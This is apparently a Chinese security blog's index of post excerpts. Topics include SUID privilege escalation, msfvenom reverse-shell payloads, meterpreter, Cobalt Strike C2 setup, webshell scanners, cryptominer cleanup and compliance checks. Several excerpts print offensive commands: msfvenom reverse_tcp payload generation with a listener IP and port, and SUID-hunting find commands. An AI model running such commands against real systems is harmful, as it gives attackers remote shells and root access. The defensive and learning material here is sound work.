摘要:
因为感觉csdn比博客园更好用一些,所以决定将博客园上的博客搬家到CSDN上(虽然也没有几篇文章,但是这表明了我打算一直写下去的决心啊)。 阅读全文
摘要:
1.介绍 PATH是Linux和类Unix操作系统中的环境变量,它指定存储可执行程序的所有bin和sbin目录。当用户在终端上执行任何命令时,它会通过PATH变量来响应用户执行的命令,并向shell发送请求以搜索可执行文件。超级用户通常还具有/sbin和/usr/sbin条目,以便于系统管理命令的执 阅读全文
摘要:
1.suid提权 搜索符合条件的可以用来提权的: find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \; find / -user root -perm -4000 -print 阅读全文
摘要:
一、身份鉴别 a)应对登录的用户进行身份标识和鉴别,身份标识具有唯一性,身份鉴别信息具有复杂度要求并定期更换; 1、应核查用户在登陆时是否采用了身份鉴别措施; 用户登录服务器需要使用账户+账户口令。 2、应核查用户列表确认用户身份标识是否具有唯一性; (more /etc/passwd) //查看命 阅读全文
摘要:
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p w 阅读全文
摘要:
1、D盾_Web查杀 使用自行研发不分扩展名的代码分析引擎,能分析更为隐藏的WebShell后门行为。 兼容性:只提供Windows版本。 工具下载地址:http://www.d99net.net/down/WebShellKill_V2.0.9.zip 2、百度WEBDIR+ 下一代WebShel 阅读全文
摘要:
一、查看cpu占用率 如果您的主机CPU占用率居高不下,那么主机很有可能已经被植入了挖矿木马,会影响服务器上的其他应用的正常运行,需要立刻上机排查。 top -c 二、清理挖矿木马 1.及时隔离主机 2.阻断异常网络通信 挖矿木马不仅会连接矿池,还有可能会连接黑客的C2服务器,接收并执行C2指令、投 阅读全文
摘要:
一、nginx日志统计分析gocaess wget https://tar.goaccess.io/goaccess-1.3.tar.gz tar -xzvf goaccess-1.3.tar.gz cd goaccess-1.3/ ./configure --enable-utf8 --enabl 阅读全文
摘要:
首先在msf下获得一个meterpreter可以通过msfvenom生成payload msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.10.41 LPORT=8888 -f exe > shell.exe 在目标主机执行s 阅读全文
摘要:
腾讯云服务器 购买域名,设置dns解析 A记录设置成服务器的ip,cs也配置在vps上 域名是suxxxat.site,绑定服务器的ip 配置完成之后ping www.suxxxcat.site 可以ping通 设置cs监听器 参考文章: https://blog.csdn.net/weixin_4 阅读全文